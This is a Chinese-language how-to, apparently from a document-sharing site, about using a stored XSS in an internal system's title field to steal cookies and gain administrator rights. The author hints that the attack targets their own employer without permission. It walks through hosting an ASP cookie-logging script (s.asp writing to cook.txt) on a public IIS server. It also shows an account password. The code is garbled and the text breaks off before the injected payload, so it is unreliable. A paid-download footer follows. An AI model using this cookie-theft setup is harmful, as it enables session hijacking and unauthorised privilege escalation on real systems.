利用xss漏洞获取cookie

2025/12/14 14:28:33

利用xss漏洞获取cookie得到管理员权限

注:不要外部传播,因为这类问题开发一直没改,被发现我会被开除的。

一. 检测xss漏洞

内网,漏洞界面截图:

我在标题和内容里输入了,保存,结果打开有xss的弹出框,经过确定是标题栏存在xss漏洞,而内容栏已经被过滤。

二. 部署偷取cookie

1.安装IIS

我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。

2.编写偷取cookie的代码 代码如下: <%

msg=Request.ServerVariables(\ testfile=Server.MapPath(\

set fs=server.CreateObject(\ set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Writeline(\ thisfile.close set fs = nothing %>

在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。

3.用我自己的帐号show/12345678登录(昵称是:我的帐号),找到刚才存在xss漏洞的界面,新建,在标题栏里输入:

因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:

利用xss漏洞获取cookie.doc 将本文的Word文档下载到电脑
搜索更多关于: 利用xss漏洞获取cookie 的文档
相关推荐
相关阅读
× 游客快捷下载通道(下载后可以自由复制和排版)

下载本文档需要支付 10

支付方式:

开通VIP包月会员 特价:29元/月

注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信:xuecool-com QQ:370150219